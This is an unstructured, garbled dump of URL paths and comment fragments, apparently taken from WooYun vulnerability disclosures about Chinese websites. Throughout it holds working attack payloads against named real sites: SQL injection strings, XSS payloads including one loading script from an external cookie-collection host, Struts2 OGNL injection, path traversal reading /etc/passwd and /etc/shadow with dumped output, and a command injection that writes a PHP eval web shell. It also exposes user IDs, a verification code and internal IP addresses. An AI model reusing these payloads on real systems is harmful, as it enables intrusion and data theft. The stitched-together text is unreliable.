/core/api/site/2.0/api_b2b_2_0_cat.php /core/api/site/2.0/api_b2b_2_0_goodstype.php /core/api/site/2.0/api_b2b_2_0_brand.php /info/ /scsx/ /marry/set_index.php?action=newslist&userid=195 /?product-gnotify /marry/set_index.php?action=newslist&userid=15 /install/svinfo.php?phpinfo=tru /ailicms/login.php /ailicms/login.php /2011ailicms/login.php /ailicms/login.php /manage/ /db/ /manage/login.php /pma210/index.php /ailicms/login.php /manage/login.php /u.php /u.php/cms /u.php/work /u.php/logent /u.php/expert xxx值 alert(document.cookie) /v/home/Shoppinglist.aspx?id1=2 /epg/template/template489/play/play.php?id=WLSP252377 /common/index.action /marry/set_index.php?page=398&action=messageboardlist&userid=118+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28table_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6D6172727938366777+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 /commentstopiccontrol.php?method=getlist&tid=DDNVZQ== / /Query.asp?ID=%27 /login.aspx; /bank1/bankdefault.aspx /strlplsp/strlpdefault.aspx /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /gfan_game/ /Login.aspx /support/FileCenter/SptDownload.aspx?path=c:\WINDOWS\system32\drivers\etc\hosts&fileName=addd.txt&type=tsm / /hwyst/question.php?question_id=120111104949 /account/ajax.php?action=deladd&id=20643 /account/ajax.php?action=deladd&id=20655 user_id:2856430 user_id:2837024 /ajax/sms.php?action=loginmobilebindcheck&mobile=150***9543&user_id=2856430&verifycode=rjpo&r=0.25387939011119365 user_id:2837024,这里的手机验证码是716392: /front/order_pay.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /cbs_portal/order/order!detail.action?id=1234 /cbs_portal/order/order!cancel.action?id=1234 partner.360buy.com /3pl/CaXun/PrintQJ.aspx?id=Q6465518 /3pl/mail.aspx /3pl/source.aspx /3pl/CaXun/PrintQJ.aspx?id=Q6465518 /Manage/Login.aspx /resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml / /Style/news.asp?action=true&RID=1&ID=1 /2010b2c/media.php?id=142 /2010b2c/login.html /thread0806.php?fid=4&search=&page=2 /thread0806.php?fid=4&search= /thread0806.php?fid=4&search= /plus/ds/dstv.php?kid=31 /1.txt /zdGpsNavi.html /MesseUserAction!findByID.action?id=59 /c52010/photo_show_detail.php?id=174 /?q=service/oppostore/p/%E5%B9%BF%E4%B8%9C/c/%E5%B9%BF%E5%B7%9E'/g/1 /Admin/login.asp /xiaonei/common/getUserSetting.action?callback= /tianlei/shumenol2/upload.php /tianlei/shumenol2/view.php?id=1845007 /_admin/log.php www.biostime.com.cn/ www.biostime.com.cn:存在Fckeditor编辑器漏洞,直接上传网马,拿到Webshell /CyanogenMod/android_system_su/blob/ics/activity.c name=".FakeSuRequestReceiver priority="10000 name="com.noshufou.android.su.REQUEST / /neirong_wangzhan.php?id=10437 /coursecommentlist.aspx?id=665 var%20b=rich_postor._editor.getHtml();c=rich_postor._getData();c.content= /forum/pic/item/6f657e2eb9389b50e1daf96e8435e5dde7116e1d.jpg"%20height="1"%20width="1 /p/2192179599 /userlist.asp efeng.com/pk/index?year=2013 /,看到就业信息,随便试了一个http://job.ncss.org.cn/job/view_job?jobId=39ce1b48e9844d3cb32a03dc56b16d49 /client/index.action /road/showdetail.php?roadid=21589存在注入点, /road/showdetail.php?roadid=2158900000000000 /user/?do=address_list&ac=add中可以插入JS代码,导致XSS /search/dosearch?searchitem=server&searchtxt=a'%20or%20'%25'%3D'&pagenum=0&cid=0&city=0&sortby=0 /search/dosearch?searchitem=server&searchtxt=a&pagenum=0&cid=0&city=0&sortby=0 /search/dosearch?searchitem=server&searchtxt=a'%20or%20'%25'%3D'&pagenum=0&cid=0&city=0&sortby=0 /domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=已注册的本域名下的DNS /domain/dnsmanage.do?method=getDomainNameserverVO&dnsName=ns1.ku6.net /user/updateAddress/id /user/updateAddress/1000000 /front/.svn/entries /front/.svn/text-base/index.jsp.svn-base /front/.svn/text-base/login.jsp.svn-base /wapLogin/getFlow.action /wapLogin/sendSms.action /wapLogin/getReal.action /productMessage/mealUseCase.action /BillDetails/getBillDetail.action /businessOperations/getAllValueAdds.action /businessOperations/BusOperInfo.action /businessOperations/handleBusiness.action /go/act/sns/ui.php?name=alert(1)&ui=%7Bwidth%3A130%2Cheight%3A60%7D&tiaocfg=%7Bsource%3A%22module%22%2CmoduleId%3A%2210%22%2Citems%3A%5B%7Bid%3A%2212877916061%22%2Cpic%3A%22%22%7D%5D%7D&Sharecfg=%7B%7D&callback=%7Binit%3A%22xdcb_sns87fcf3117670a_parent%22%2Chide%3A%22xdcb_snsb1490bea6fc62_parent%22%2Cshow%3A%22xdcb_sns3a2ea08a237c7c_parent%22%7D&_iframe_id=%22sns1cfb66c62805a9%22 /view_image.php?pic=Wx0GGlFDXA1VUwMDWx0SCwkNGRFcVxxQW1UcCxMFRBkDCFdVV1cRRhpVRDhHEVp3YmtTbngxKgslQh0XDGsDB0FbR1NFBgYV&title=ob7Qx9S3w%2FvXsaG%2FID%2FQwsTvuvOw67PMuPrXsT8gMjAwfjYwMNSq&version=2&c=ZGY0YmE1MWYzODZiMDU3NWYxZTYyNzYxNDFjZGZiZjM%3D&itemId=\x22\x3e\x3cimg\x20src=1\x20onerror=alert(1)\x3e\x3ci\x20a=\x22pkavoverx&shopId=34423124&sellerRate=28&dbId=&fv=9 /go/act/sale/danpin660x90-0813.php?p4p=alert(1);pkavover /go/act/sale/danpin190x300-0809.php?p4p=alert(1);pkavover /go/act/sale/danpin336x280-02.php?p4p=alert(1);pkavover /go/act/sale/tbkelite_mainchannel1.php?callback=alert(1);pkavover /go/act/danpin300x250ceshi0915.php?p4p=alert(1);pkavover /go/act/try/widget-iframe.php?widget=0&type=32&status=1&tag=%BD%F0%B1%D2&sort=buyStatus_startTime&maxNum=50&pic=160&width=740&height=1200&layout=1&pt=%22%3E11111%3Cscript /member/autoReglogin/auto_reglogin.htm?reg_type=0&is_need_login=true&is_need_reg=true&from=autoReglogin&dis_title=false&callback=TB.app.FastBuy.DoAuth&auto_iframe_height=a;alert(1)}catch(e){}};alert(1);function /license!getExpireDateOfDays.action /license!getExpireDateOfDays.action /tender_details.php?tid=106替代能源推广中心 /tender_details.php?tid=4074城市发展部 /tender_details.php?tid=332 /tender_details.php?tid=2101 /eproc/tender_details.php?tid=58巴格马蒂河治理委员会 /tender_details.php?tid=19814联邦事务和地方发展部 /tender_details.php?tid=1744电信 /tender_details.php?tid=95 /search/searchById?id=1713675 /twsearch/twSearch?key= /1581 /a2Dy void(0) /peifo/ /skins/dttmk.php /login.do?state=login /login.do?state=publicFilesDownload&filename=../../../../../../../../../etc/passwd /login.do?state=publicFilesDownload&filename=../../../../../../../../../etc/shadow /.svn/entries /.svn/text-base/cache.jsp.svn-base /admin/.svn/text-base/login.jsp.svn-base / /client.php /order.php /time.php / /user/mall.html mione_plus:2.3.5/GINGERBREAD/2.3.6f:userdebug/test-keys /phpmyadmin/ pinyin.sogou.com/tailors/home.php?ac=publicskin&item=other&skin_id=0&tid=0&utid= mysql://10.10.92.30:3306/adserv /bugs/wooyun-2013-017481 weibo.cn weibo.com可以找到大量的gsid,经过测试, /u/1768856242?vt=1&wm=4007&gsid=xxxxxxxxxxx /?keyword=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Ca+ /view/index.action /p/android/issues/detail?id=14602&q=exploit&colspec=ID%20Type%20Status%20Owner%20Summary%20Stars /login.action /aj_re/add?__rnd=1362498869847 /csrf/weibo.html /index.php?sid=28934 5?a700e979991e40:174.132.203.250 6da8202948d6a2db:10.30.33.56 /admin/admin.php /center/notice_msg_detail.php?group=shalu /center/notice_msg_detail.php?group= /editor/editor/filemanager/upload/php/upload.php?Type=Media /interface/album/album.php?op=3&iId=11&name= /interface/album/album.php?op=13 /interface/ugc/ugc.php /interface/album/album.php?op=13 /interface/album/album.php?op=13 /interface/album/album.php?op=3&iId=11&name= /interface/album/album.php?op=13 /hskxread.php?id=1638 /hskxread.php?id=1638 /hskxread.php?id=1638 /instruction/unclaim.htm?page=758&cnName=&by=%28case%20when%281=1%29%20then%20id%20else%20cnName%20end%29&order=desc /instruction/unclaim.htm?page=758&cnName=&by=%28case%20when%281=2%29%20then%20id%20else%20cnName%20end%29&order=desc / /cgi-bin/php-cgi/html/redirect.php?-s /cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php /cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod /journalx/secure/admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector /CN/item/downloadFile.jsp?filedisplay=../../CN/item/downloadFile.jsp /sineactive/article/10 /aomei2011/hospital/31%20and%201=2%20union%20select%201,2,database%28%29,4,5,6,user%28%29,8,9,0,1,2,3,4,5,6%23 /aomei2011/person/867%27%20and%20%27%27=%27 /videos/list/12%27%20and%201=1%20and%20%27%27=%27 /videos/list/12%27%20and%201=2%20and%20%27%27=%27 /jperfect/jperfect/admin/ /jperfect/jperfect/admin/?act=check&tname=mkt_counter%bf'%20union%20select%201,2,3,4,5,6,group_concat(schema_name)%20from%20information_schema.schemata%23 /news_c.php?cid=46000000000000000000000 /news_c.php?cid=46000000000000000000000 /admin /register/reg_service.aspx)获取手机验证码,只需要提供手机号,无需手机接收即可获取验证码。 /?q=software&d=ASCx /?q=software&d=ASC,%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29 /?act=u_itemlist&queryinput=sdfsf%27fs /?act=u_example_more&itemid=862%27 /index.php?q=mp3/product/detail&name=X7%27 /?q=index/list&model=A209&sortby=downloads%20asc /?q=index/moreRecom&model=A209&sortby=downloads&order=DESC /?q=interface/editor&name=x905%27&fid=209 /?q=interface/editor&name=x905%27%20and%201=2%20union%20select%201,user%28%29,3%23&fid=209 /do.php?ac=login&rfu=http://paper.pubmed.cn/ /do.php?ac=login&rfu=(可构造任意链接进行跳转) /article站点的搜索处的XSS进行测试。 /article/search.htm?keywords=%3C%2Ftitle%3E%3Cscript+src%3D%22http%3A%2F%2Fxss.ezsec.org%2F%3Fu%3Df71717%22+%3E%3C%2Fscript%3E&category=-1&action=Search&action_search= /E273r7 /User/PassCardEdit.aspx?id=900 /news.details.php?id=219 /phpmyadmin/ /index.php?d01=G1F8V0B /_sysadmin/index.php /examinate/system/login.do /my/login.php 19.0 /my/reset_password.php?step=reset&verifycode=xxxx&id=xxx /uploadfile/avatar/113626382045.php /wp-content/uploads/recipt_imgs/20130307075334.php /mall/task/ajaxShareGoods /iframe.html?rnd=1362575759788 / /bugs/wooyun-2012-08966 /portal/auth/reg_newuser.jsp /zhuce/admindata/shansuirencaidata.mdb /index/onlineAgent.do /GM/af/contract_getPassWord.do /MUB2G/login/loginAction_initSession.do /tmp/updateme/sinfor/ad/sys/sys_user.conf /plus/search.php?keyword=as&typeArr[111%3D@`\ / / /ProductShow.asp?ListId=185 /admin/uploadfile.asp?todo=uploadfile /support/digital_cameras/software_detail.php?id=81 /cdtv_game_api/index.php/module/aciton/param1/$%7B@phpinfo()%7D /about/404/images/wooyun.php / /login.jsp /login.jsp /login.jsp /news_details.php?id=107000000 /2011.php /hp/home?uid=55804 /page.php?id=206 /page.php?id=206 /page.php?id=206 /hotelinfo/Hotel.aspx?hotelID=2001272&StayDays=1&Rooms=1&checkin=0001-01-01 /iframe_brief.php?style_id=103639221 /PointGift/ListView.aspx?membertype=2&giftTypeID=8 /coupon_detail?coupon_id=201623 /robots.txt /admin /node/359 /node/360 /node/361 /node/362 /site/news/infodetail.php?strID=13379 /vhostmanage.do?method=viewVhostInfo&serviceCode=VMOVE0804250**** /policyRuleWeb!detail.action?id=701 /新闻内容.aspx?aid=439 / /portal/db/dbupdatelog_list.jsp /portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&PageIndex=1&OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG /portal/db/dbupdatelog_addedit.jsp /svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp /settings/personal 126.am/dTPsg2 /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /settings/personal none 126.am/dTPsg2 /aZfcn / /tmp/updateme/sinfor/ad/sys/sys_user.conf /qa/index.php /qa/index.php?qa=account这里改了个名字 /setting/change-email /setting/profile /gis/reports/menu.php?id=ImpactFeesReport /gis/reports/output.php?id=ImpactFeesReport&month=3&year=2013&fee_type=all&fee_status=all&detail=limited&format=html /gis/reports/output.php?id=ImpactFeesReport;phpinfo();&month=3&year=2013&fee_type=all&fee_status=all&detail=limited&format=html /resv/print.aspx?resvCode=RW1303080000014257-R10001610000xxxxxx /寻找几个妹子帐号……厂商记得把她改回去哦……邮箱联系她嘛~~就选doriswoods吧 /member/ /content.php?typeid=1&gid=17 /play.php?class_id=22 /fresh/fresh.aspx?id=1 /web/template/web-articleInfo.action?bookArtId=29405 /toyotaadminqwerty/WebToYoTa913AsDf/login.php /App_User_UserUpload.php?type=1&user_id=508387182 /autoparts?1=3&p=3&p01=-1 www.faw-vw.com/autoparts?k= /xxxxx /charge.action /fajian/2013-03-10/755003105011.JPG /fajian/2013-03-10/755003105010.JPG /fajian/2013-03-10/755003105009.JPG /fajian/2013-03-10/755003105007.JPG /fuc/tk.php?i=ddd%22/%3E%3Cimg%20src=1%20onerror=alert%281%29%3E%3C /Member/OrderDetail/1303111304257871 /wandaFilm/home.action www.youku.com /content/1693 220.181.154.91/123.126.98.141(这个机器留有rootkit麻烦及时清理) /log.txt /log.txt /log.txt /log.txt /uc_server/control/admin/db.php /source/plugin/myrepeats/table/table_myrepeats.php /readme.txt /test.php /admincp.php /fckeditor/editor/dialog/fck_about.html /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fceping.xdf.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php /info.php / /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /UserCenter/GetIcon.aspx?id=107130 /DCC/domainSourceIPDetail.do?method=sourceIPDetail&domainName=adimg.51auto.com /DCC/accountDetail.do?method=accountDetail&id=51auto www.icolor.com.cn /cms/upload/fjsc.jsp?filePath=cms-uploadfiles-download&isfn=1&ischeck=1&fileType=.jpg,.bmp,.gif,.rar,.zip,.doc,.jsp,.wps /mngr/user/userInfo.jsp /mngr/check/getRingContentList.action?operGroupLevel=0&start=10 /mngr/privilege/getPrivilegeListByGroupId.action?operGroupLevel=0 /mngr/check/getHistoryRecord.action?historyType=&start=100 /Car/OrderDetail.aspx?o=4206136 /member/mypub2010/user/userchanges_ajax.asp?act=yzemail&email=yourmail@qq.com /member/mypub2010/user/ver_tel.asp?mobile=&yzm=%22%3E%3Ciframe%20src=http://g.cn%3E /member/mypub2010/user/ver_tel.asp //plus/search.php?keyword=as&typeArr[111%3D@`\ ///plus/search.php?keyword=as&typeArr[111%3D@`\ /ticket/passenger/passenger_info.jsp?&type=passenger&callback=qunarcallback /2012/kongtiao/works.php?works=81 /pmis/factory/login.php /server/login.jsp /login/?next=/ /dragon/login.php /2010mini/lephonesns/admin/ /newadmin/login.php /2012/china4abm/ /pv/ip.php / /2012/motorolarazrv/quespc.php?tmpid=KR8eNVfQ&quesid=8 /2012/tsingtao/join.php?t=7@2*dgvsydl /dragon/admin/commend_list.php / www.j1.com /ROACON/index.html /wsUDT/url/ia-user-task!update.action?userTask.taskId=2504 /admin/(http://211.137.84.199:8080/admin/)两个是一样的 / /gsaicEn/regedLogin!login.do /util/downFile.jsp?fileName=../util/downFile.jsp /xuexi/login.action /notice/login.do /logon.action /college/16 /college/16 /college/16 /jobdetail.aspx?id=329 /spDepartRepertory/spDepartRepertory!repList.action?deptid=32&domainCode=PDSS /index!index.action?department.code=zhongxin /funing/front/wsbsthird.action?id=120&tid=306 /index!department.action?level=3®ionID=1&departmentID=158 /login/login.action /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /dapei/woyaodapei/?act=scheme&styleid=8&roomid=19 /dapei/woyaodapei/?act=scheme&update=update&uid=3165 green.lsea.com.cn/admin/default.aspx /account/saveAddress /count2.php?start=1363142400&end=1363314780&adid=3666 /pms/home/login.action 19.0 /sysadmin/htm/index.php?q=user/getbackpass&back=/sysadmin/htm/index.php?q=myoppo/index /weibo/%2522%253E%253Cscript%253Ealert%28%252Fxss%252F%29%253C%252Fscript%253E&Refer=STopic_box /cmsadmin/index.jsp /m.php?m=UserCenter&a=show_order&id=1677234&s=45191f0d0401d8a026cc9ac15f799026,id=xxxx /m.php?m=UserCenter&a=show_order&id=1234567 /index.php?m=UcOrder&a=del&id=1234567 /mydns/recordsList.do?DomainName=xinnet.com&mystring=[MD5]&mystring2=[跟代理商有关的一个编号 submitDNSFormaaa('域名') /domain/manage.do?method=list&serviceState=02&forward=inusing /mydns/recordsList.do?DomainName=[目标域名]&mystring=[目标域名的MD5]&mystring2=[跟代理商有关的一个编号 /zh-tw/news/NewsListAll.aspx?kinds=2&newskind=1 /passport/Regist.aspx /system/login.do /g2/login.action /cn/search.aspx?k= /guide/message.html /guide/mes_dis.jsp /guide/mes_detail.jsp?id=133439 /guide/mes_detail.jsp?id=133428 /12/0401/15/7U11041B0001125P.html / /admin/ 114.247.0.52 /unicom/UltraProcess/ManageProcess/BaseInfoPrint.jsp?baseid=000000000001343&baseschema=UltraProcess:UniComm_Others&isarchive=0 18897/eyooboard/include/data/message.db /?i=3371),我还纳闷,为啥用户名是这个?原来是这货的邮箱名,再加上信息综合匹配度猜测,可以看的出这货不怎么保护个人信息,这些信息准确率达到90%以上!) /?i=3371),这意味着什么?这意味着他妈的有一个通用的后门存在!!! /product-17312.html /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /tmp/updateme/sinfor/ad/sys/sys_user.conf /xx.com /topic.php?channelID=70&topicID=140&pid=66 /share/download.jsp?filePath=../../../../../../etc/passwd /account/accountInfo/gerAddressByIdAjax/?id=5 /index.action /plugins/index.php?q=imgurl&url=QGltZ3VybEAvZGF0YS9pbWFnZXMvYXZhdGFyL25vYXZhdGFyX21pZGRsZS5naWY&id=112 /download_con.shtml#1 /sphoto/bupt/login.htm /sphoto/bupt/login1.htm www.tpri.gov.cn /?u=954d3d /cx.asp / www.qhjc.gov.cn //shop/100501/infocase/%24%7b%40print(md5(admin))%7d / www.siilu.com /index/clue?clueid=-1%20or%2011=11 / www.siilu.com / www.siilu.com web.mmc.edu.cn/wsc/dede/ /whir_system/module/security/login.aspx /whir_system/module/security/login.aspx /cms/console/zhuantipinglun.php?pagesize=10&zhuanti_id=1 /tcsoft/web/information.do?actionCmd=childList&pid=9&id=57&isChild=0)中,有不少城市图书馆采用了INTERLIB这套系统。所以这个漏洞影响巨大,泄露的个人信息已百万计,下面会进行证明。 /interlib/websearch/bookSearch?cmdACT=detailmarc&xsl=listdetailmarc.xsl&bookrecno=243630 /)采用的存在SQL注入漏洞的老ShopEx /shopadmin/index.php?ctl=passport&act=login。就不登录后台了,点到为止。 /bugs/wooyun-2013-020130——“尚品网任意邮箱绑定漏洞(两种不同方法)” /club.duiyi.tom.com.rar /club.aspx?clubid=233 /turbosearch/product.jsp?lb=2&zlb=%BF%B9%D1%D7%BF%B9%B2%A1%B6%BE%D3%C3%D2%A9 /turbosearch/product.jsp?lb=2&zlb=%BF%B9%D1%D7%BF%B9%B2%A1%B6%BE%D3%C3%D2%A9%25%27%20AnD%20%27%25%27%3d%27 /feedback.html就进来了。xss啊。我等了一个多月才来cookie啊,伤不起啊。单纯测试的。有什么不着的地方希望不要放在心里。 /bugs/wooyun-2013-020128”,从这里得到我们想要的用户的邮箱地址,真实天助我也啊,哈哈哈。。。 /api/index/m/regist.isExistMail?mail=快播邮箱 /api/index/m/regist.isExistUsername?username=快播帐号 /regist.html / admin /index.php?op=ackrecvmsgbylastmsgid&_from=comet&rnd=0.9776598419994116 /redirect/?ad=32444&uid=&bid=Qm2N20BkIoU&unit=dale_homepage_online_activity_promo_2&crtr=3%3A%2F&cfg=78b3d142b7d8af4aaad54eac7b0d6d3c0deae0c7&ns=1363416628656164000&target=http://site.douban.com/infiniti/room/2674886/"%0d%0aalert(1)%0d%0a /derscn/portal/UserInfoAction.do?method=edit&loginName=mytest001 /derscn/portal/UserInfoAction.do?method=edit&loginName=admin /index.php/index/friend/follow/type/1/name/wooyun2 /user/getpassword /admin/member/dwlist.cfm?id=XXX alert(/1/) /admin/admin.asp /p/2214633607 /download/seeepdds/4385943)把封禁吧名UTF-8编码。。之后ANSI解码,解码后是汉字就可以了。 /f/center/createtb?kw= /app/enter?appid=291067)把封禁吧名UTF-8编码,再把编码放进(http://tieba.baidu.com/f/center/createtb?kw=【这里面】)按回车。 /bbs/viewthread.php?tid=3671011 /bbs/attachment.php?tid=3671011&aid=9590&pay=yes /vote.asp?action=show&id=1 /servlet/DownloadFileOper?fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:81:81:System /:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:25:25:Named:/var/named:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin x:501:600:websphere_user:/opt/Websph:/bin/bash x:701:700:manager:/home/wangww:/bin/bash /scm/download.jsp?filename=..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2fetc%2fpasswd x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:37:37::/var/lib/rpm:/sbin/nologin x:81:81:System /:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:25:25:Named:/var/named:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin x:33:6:Amanda /var/lib/amanda:/bin/bash x:89:89::/var/spool/postfix:/sbin/nologin x:41:41:GNU /usr/lib/mailman:/sbin/nologin x:92:92:Quagga /var/run/quagga:/sbin/nologin x:93:93::/var/spool/exim:/sbin/nologin x:98:98::/home/ident:/sbin/nologin x:73:73::/etc/privoxy:/sbin/nologin x:75:75:radvd /:/sbin/nologin x:55:55:LDAP /var/lib/ldap:/bin/false x:100:103:UUID /var/lib/libuuid:/sbin/nologin x:76:12:Cyrus /var/lib/imap:/bin/bash x:95:95:radiusd /:/bin/false x:66:65:tog-pegasus /var/lib/Pegasus:/sbin/nologin x:500:500:wangww:/home/wangww:/bin/bash x:501:600:Websphere:/opt/WebsPhere:/bin/bash x:502:502::/home/wsadmin:/bin/bash /rest/2.0/pim/contacts?method=iterator&limit=10000&app_id=20&ignore_error=1&callback=xx /qzone/app/blog/v6/script/content_gridsblog.js /cgi-bin/blognew/add_blog?ref=qzone&g_tk=1129658366 /shared/index.php?del_id=1787(需登录) /search?hl=zh-CN&newwindow=1&safe=strict&q=site%3A7daysinn.cn+filetype%3Axls&btnG=Google+%E6%90%9C%E7%B4%A2 /Attachment/File/type2/20125/4%E6%9C%88%E4%BB%BD[%E7%9F%B3%E5%AE%B6%E5%BA%84%E6%AD%A3%E5%AE%9A%E5%BA%9C%E8%A5%BF%E8%A1%97%E5%BA%97]%E9%93%B6%E8%A1%8C%E6%98%8E%E7%BB%86%E5%B8%902012513108142913.xls //m.php?a=show&id=29805&m=../../../../../../../../../../etc/passwd%00.jpg&s=bc98bcd5ae717f1aa7a4d6082a8e019f /topicLab/index.php /search.php?stype=search_info&channelid=&q=%22%3E%3CIMG+SRC%3DJaVaScRiPt%3Aalert%28document.cookie%29%3E /?m=archives&a=serach&title=%22%3E%3CIMG+SRC%3DJaVaScRiPt%3Aalert%28document.cookie%29%3E&type=0 /rssFeed.php?id=1105 / / /domainLogin.do?method=yidabaDomain&domainName=[目标域名]&md5=[域名管理密码md5值 /download.aspx?file=xxx.xxx的链接,下载一些文件,包括网站配置文件,从配置文件中又可以获取到农行交易记录 qzs.qq.com swf /music/qzone/qzone_tv_player.swf /music/qzone/qzone_tv_player.swf?a=【某个符号】 /music/qzone/qzone_tv_player.swf?a= 